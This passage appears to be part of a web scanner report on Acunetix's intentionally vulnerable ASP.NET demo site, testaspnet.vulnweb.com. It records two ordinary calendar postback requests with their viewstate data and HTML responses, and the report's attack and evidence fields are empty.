Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1149 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,149 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8293&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAnTutltoIZGRkRKdIzq92kaJj%2FOU%2F5t3r1j%2Fq0s8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLo8P5DAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACRp4K83fXk88aClImmaIKuaD32eI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:22 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAnTutltoIZGRkRKdIzq92kaJj/OU/5t3r1j/q0s8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLo8P5DAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACRp4K83fXk88aClImmaIKuaD32eI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:White" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8345&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAGNmJv9oIZGRk2lvd%2BvbpUtkuNtV%2B57mXtipKPO4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLO9eLVDwLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAxhfAIQr3NyIgvcmSD9mIi4irW3l
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:23 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAGNmJv9oIZGRk2lvd+vbpUtkuNtV+57mXtipKPO4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLO9eLVDwLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAxhfAIQr3NyIgvcmSD9mIi4irW3l" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:White" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built 